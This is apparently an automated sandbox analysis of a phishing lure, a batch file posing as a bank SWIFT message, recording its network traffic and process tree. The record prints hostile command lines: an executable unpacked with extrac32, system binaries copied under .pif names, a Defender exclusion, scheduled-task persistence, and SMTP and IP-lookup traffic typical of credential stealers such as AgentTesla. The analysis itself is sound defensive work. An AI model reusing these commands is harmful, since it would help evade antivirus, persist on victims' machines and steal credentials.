2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 Data Ascii: 6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqy
2024-11-11 17:02:28 UTC	16384	IN	Data Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
2024-11-11 17:02:28 UTC	387	IN	Data Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	104.26.12.205	443	4352	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:02:39 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-11 17:02:39 UTC	399	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:02:39 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e0fd9e81c677290-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=1803237&cwnd=237&unsent_bytes=0&cid=9079a08c4e887110&ts=185&x=0"
2024-11-11 17:02:39 UTC	13	IN	Data Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 Data Ascii: 66.23.206.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	104.26.12.205	443	7572	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:02:48 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-11 17:02:49 UTC	398	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:02:48 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e0fda23faca6fcb-IAD server-timing: cfL4;desc="?proto=TCP&rtt=6825&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=421788&cwnd=223&unsent_bytes=0&cid=718f6f28a0d629f6&ts=182&x=0"
2024-11-11 17:02:49 UTC	13	IN	Data Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 Data Ascii: 66.23.206.109

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	104.26.12.205	443	7852	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:02:56 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-11 17:02:56 UTC	399	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:02:56 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e0fda54ec7d0ca8-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2574222&cwnd=251&unsent_bytes=0&cid=13d8de2d2f76e1c4&ts=381&x=0"
2024-11-11 17:02:56 UTC	13	IN	Data Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 Data Ascii: 66.23.206.109

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 11, 2024 18:02:41.676111937 CET	587	49708	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:41.676249981 CET	587	49708	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:41.676502943 CET	49708	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:02:41.678276062 CET	587	49708	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:40 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:41.855956078 CET	587	49708	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:02:41.856158972 CET	49708	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:02:42.024333954 CET	587	49708	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:02:44.679507017 CET	587	49714	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:44 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:44.679627895 CET	49714	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:02:44.846915960 CET	587	49714	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:02:44.847193003 CET	49714	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:02:45.014750004 CET	587	49714	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:02:51.852518082 CET	587	49716	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:51 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:51.872674942 CET	49716	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:02:52.040124893 CET	587	49716	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:02:52.041109085 CET	49716	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:02:52.208816051 CET	587	49716	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:02:54.524229050 CET	587	49717	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:54 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:54.536268950 CET	49717	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:02:54.704108953 CET	587	49717	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:02:54.704310894 CET	49717	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:02:54.872011900 CET	587	49717	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:02:58.946044922 CET	587	49719	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:02:58 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:02:58.947397947 CET	49719	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:02:59.114902020 CET	587	49719	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:02:59.115664005 CET	49719	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:02:59.284118891 CET	587	49719	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:03:01.937180042 CET	587	49720	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:03:01 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:03:01.937777996 CET	49720	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:03:02.105014086 CET	587	49720	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:03:02.106460094 CET	49720	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:03:02.274686098 CET	587	49720	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:04:36.553313017 CET	587	49724	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:04:36 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:04:36.553467035 CET	49724	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:04:36.555336952 CET	587	49725	51.195.88.199	192.168.2.8	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 11 Nov 2024 17:04:36 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 18:04:36.555495977 CET	49725	587	192.168.2.8	51.195.88.199	EHLO 377142
Nov 11, 2024 18:04:36.720927000 CET	587	49724	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:04:36.721096039 CET	49724	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:04:36.723057985 CET	587	49725	51.195.88.199	192.168.2.8	250-s82.gocheapweb.com Hello 377142 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 18:04:36.723264933 CET	49725	587	192.168.2.8	51.195.88.199	STARTTLS
Nov 11, 2024 18:04:36.888806105 CET	587	49724	51.195.88.199	192.168.2.8	220 TLS go ahead
Nov 11, 2024 18:04:36.891134024 CET	587	49725	51.195.88.199	192.168.2.8	220 TLS go ahead

Target ID:	0
Start time:	12:02:24
Start date:	11/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "
Imagebase:	0x7ff6ce280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:02:24
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:02:24
Start date:	11/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff767990000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:02:25
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'056'768 bytes
MD5 hash:	BDC3B662D1136F20F51F55A0F6A2FB9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:02:29
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:02:29
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:02:30
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0x60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:02:30
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0x60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:02:31
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Imagebase:	0x60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:02:31
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:02:31
Start date:	11/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:02:32
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xd90000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:02:32
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase:	0xe30000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x530000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x7ff6ee680000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xf80000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	12:02:35
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:02:36
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:02:36
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0xfe0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:02:37
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0xa90000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:02:39
Start date:	11/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	12:02:43
Start date:	11/11/2024
Path:	C:\Users\Public\Libraries\Wisrysxl.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Wisrysxl.PIF"
Imagebase:	0x400000
File size:	1'056'768 bytes
MD5 hash:	BDC3B662D1136F20F51F55A0F6A2FB9D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:02:44
Start date:	11/11/2024
Path:	C:\Users\Public\Libraries\lxsyrsiW.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\lxsyrsiW.pif
Imagebase:	0x400000
File size:	68'096 bytes
MD5 hash:	C116D3604CEAFE7057D77FF27552C215
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

